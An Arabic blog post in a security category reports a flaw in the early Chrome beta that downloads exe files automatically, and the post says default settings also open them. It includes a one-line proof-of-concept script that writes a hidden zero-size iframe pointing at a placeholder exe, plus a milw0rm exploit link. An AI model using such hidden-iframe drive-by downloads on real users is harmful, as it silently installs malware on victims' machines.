ثغرة تؤدي الي تحميل ملفات exe في المتصفح Google Chrome Browser

تحت تصنيف security بواسطة admin

السلام عليكم

يادوب النسخة البيتا من المتصفح الجديد الخاص بشركة جوجل نزلت

وفي الحال تم اكتشاف ثغرة تؤدي الي تحميل الملفات التنفيذية exe مباشرة بدون اعطاء العميل ادني اشارة الي بدأ التحميل

طبعا هيه ممكن تتحكم فيها من الاعدادات الخاصة بالمتصفح انك تخليه يسئلك عن مكان تحميل الملف

لكن هوه بيكون تلقائي مظبوط علي الاعدادت اللي عملت المشكلة وهي انه بيحمل الملفات تلقائيا وكمان بيفتح الملف بعد تحميله تلقائيا

يعني مصيبة

تخيل لو واحد لبسك باتش ومشفره وبعتلك iframe متشفر

وانا ضغطت وحمل واشتغل في الخلفية وانت مش واخد بالك

علي العموم الثغرة لسه طازة

الثغرة تم تجربتها علي

Windows Vista SP1 & Windows XP SP3   

exploit:


<script>
document.write(’<iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″>’);
</script>

links:

http://www.milw0rm.com/exploits/6355